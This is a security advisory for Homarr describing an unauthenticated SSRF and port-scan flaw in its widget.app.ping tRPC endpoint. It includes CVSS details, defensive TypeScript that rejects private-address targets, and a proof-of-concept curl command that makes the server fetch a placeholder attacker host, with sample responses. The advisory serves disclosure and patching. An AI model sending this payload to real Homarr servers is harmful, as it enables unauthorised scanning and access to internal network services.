Unauthenticated SSRF / Port-Scan Primitive via widget.app.ping

Moderate
Meierschlumpf published GHSA-c6rh-8wj4-gv74 Feb 6, 2026

Package

homarr-labs/homarr (Docker image)

Affected versions

<= 1.51.0

Patched versions

>= 1.52.0

Description

Summary

A public (unauthenticated) tRPC endpoint widget.app.ping accepts an arbitrary url and performs a server-side request to that URL. This allows an unauthenticated attacker to trigger outbound HTTP requests from the Homarr server, enabling SSRF behavior and a reliable port-scanning primitive (open vs closed ports can be inferred from statusCode vs fetch failed and timing).

Details

The procedure is implemented in:

  • packages/api/src/router/widgets/app.ts as ping: publicProcedure.input(z.object({ url: z.string() })).query(...)

It calls sendPingRequestAsync(input.url) (server-side fetch) and returns:

  • statusCode and durationMs on success
  • an error (e.g., fetch failed) on failure

Because the procedure is publicProcedure, the functionality is reachable without authentication and can be abused by any network user who can reach the Homarr instance.
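The root cause is a public procedure that forwards a caller-supplied string straight into a server-side fetch. The following is an added example, not Homarr's code, showing the kind of target validation a hardened version of such a procedure would apply in addition to requiring authentication. It assumes the check runs after the URL has been parsed by the WHATWG URL parser (so that alternative IPv4 spellings are normalised before the range check) and that a production deployment would also verify the address a hostname resolves to, which a literal check like this one does not do.

```typescript
// Added example (not Homarr's code): validate a user-supplied ping target
// before any server-side fetch. Assumption: the procedure has already been
// switched from a public to an authenticated one; this is the second layer.

type IPv4 = [number, number, number, number];

const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

/** Parse a dotted-quad IPv4 literal into its four octets, or null. */
function parseIPv4(host: string): IPv4 | null {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = [Number(m[1]), Number(m[2]), Number(m[3]), Number(m[4])] as IPv4;
  return octets.every((o) => o <= 255) ? octets : null;
}

/** True for loopback, link-local, RFC1918 and other non-public IPv4 ranges. */
function isPrivateIPv4([a, b]: IPv4): boolean {
  return (
    a === 0 || // 0.0.0.0/8
    a === 10 || // 10.0.0.0/8
    a === 127 || // loopback
    (a === 169 && b === 254) || // link-local, includes cloud metadata endpoints
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168) || // 192.168.0.0/16
    (a === 100 && b >= 64 && b <= 127) || // shared address space 100.64.0.0/10
    a >= 224 // multicast and reserved
  );
}

type PingCheck = { ok: true; url: URL } | { ok: false; reason: string };

/** Decide whether a user-supplied ping target may be fetched server-side. */
function checkPingTarget(raw: string): PingCheck {
  let url: URL;
  try {
    // Parse first: the URL parser turns forms such as "0x7f000001" or
    // "2130706433" into "127.0.0.1", so the range check below sees the
    // canonical hostname rather than the caller's spelling.
    url = new URL(raw);
  } catch {
    return { ok: false, reason: "not an absolute URL" };
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { ok: false, reason: "protocol " + url.protocol + " not allowed" };
  }
  if (url.username || url.password) {
    return { ok: false, reason: "credentials in URL not allowed" };
  }
  const host = url.hostname;
  // Bracketed IPv6 literals are rejected outright: a dashboard ping rarely
  // needs them and IPv4-mapped forms (::ffff:a.b.c.d) are easy to misjudge.
  if (host.indexOf(":") !== -1) {
    return { ok: false, reason: "IPv6 literals not allowed" };
  }
  if (host === "localhost" || /\.localhost$/.test(host)) {
    return { ok: false, reason: "loopback hostname" };
  }
  const v4 = parseIPv4(host);
  if (v4 && isPrivateIPv4(v4)) {
    return { ok: false, reason: host + " is a non-public address" };
  }
  return { ok: true, url };
}
```

A deny-list of address ranges only narrows the primitive; where the dashboard's ping targets are known, an explicit allow-list of hosts is the stronger control, and either way the fetch should be performed with a short timeout and with redirects disabled so the check cannot be bypassed by a redirect to an internal address.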

Proof of Concept (PoC)

  1. Start a simple HTTP server on an attacker-controlled host:

     python3 -m http.server 8080

  2. From any machine that can reach the Homarr API, call the ping endpoint (no auth required):

     curl -sG 'http://<HOMARR_HOST>:7575/api/trpc/widget.app.ping' \
       -H 'trpc-accept: application/jsonl' \
       --data-urlencode 'batch=1' \
       --data-urlencode 'input={"0":{"json":{"url":"http://<ATTACKER_HOST>:8080/test"}}}'

  3. Observe:
     • Homarr returns statusCode/durationMs when the port is open and reachable.
     • Homarr returns error: "fetch failed" when the port is closed/unreachable.

Example results:

  • Open port → {"statusCode":404,"durationMs":...}

  • Closed port → {"error":"fetch failed"}

Also confirmed by web server logs showing requests originating from the Homarr server IP.

Impact

This allows:

  • Server-side request forgery (SSRF-like behavior): Homarr can be forced to make outbound requests to arbitrary hosts.

  • Port-scanning primitive from the Homarr network perspective (distinguish reachable services).

  • Potential access to internal-only services (e.g., 127.0.0.1 / RFC1918 / cluster network), depending on deployment.

  • Potential side effects if internal endpoints perform actions on GET requests.

Severity

Moderate

CVSS overall score


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID

CVE-2026-25123

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Credits